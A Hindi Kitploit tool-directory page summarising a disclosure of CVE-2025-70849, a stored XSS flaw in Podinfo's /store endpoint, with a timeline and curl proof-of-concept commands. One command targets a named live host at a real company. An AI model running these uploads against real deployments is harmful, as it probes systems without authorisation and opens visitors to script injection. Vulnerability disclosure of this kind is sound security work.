Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-70849 — CVE-2025-70849: Podinfo में संग्रहीत XSS | Kitploit
उपकरण/GitHubGitHub/deaprojects/cve-2025-70849
भेद्यता विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubdeaprojects/cve-2025-70849

CVE-2025-70849

CVE-2025-70849: Podinfo में संग्रहीत XSS

रिपॉजिटरी देखें
13 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-70849: Podinfo में Stored XSS

सारांश

Podinfo में एक सुरक्षा भेद्यता (CWE-79) की पहचान की गई, जो Kubernetes माइक्रोसर्विसेज को प्रदर्शित करने के लिए एक वेब एप्लिकेशन है। /store सुविधा अनधिकृत उपयोगकर्ताओं को मनमानी HTML/JS सामग्री अपलोड करने की अनुमति देती है, जिससे Stored XSS उत्पन्न होता है।

भेद्यता विवरण

  • CVE ID: CVE-2025-70849
  • उत्पाद: Podinfo
  • प्रभावित एंडपॉइंट: /store
  • भेद्यता प्रकार: Stored Cross-Site Scripting (XSS)
  • प्रभावित संस्करण: <= 6.10.0

प्रमाण-अवधारणा (PoC)

  1. दुर्भावनापूर्ण पेलोड भेजें:
    root@kitploit:~
    curl -X POST https://target/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
    
    लाइव टार्गेट के साथ उदाहरण:
    root@kitploit:~
    curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
    
छवि
  1. लौटाए गए हैश तक पहुँचें: https:///store/

    उदाहरण: https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store/8c1591e1b1e025067a2d73c0853b9a76bd8fc91a

    छवि

समयरेखा

  • खोज: सितंबर 2025
  • विक्रेता को सूचित किया गया: 25 अक्टूबर 2025
  • विक्रेता की प्रतिक्रिया: स्वीकार किया गया; फिक्स के लिए कोई वर्तमान समयरेखा नहीं बताई गई।
  • सार्वजनिक खुलासा: फरवरी 2026

अस्वीकरण यह शोध केवल शैक्षिक उद्देश्यों के लिए है।

धन्यवाद :

Kazi Sabbir |

गंभीरता: मध्यम 6.4

टूल डाउनलोड करें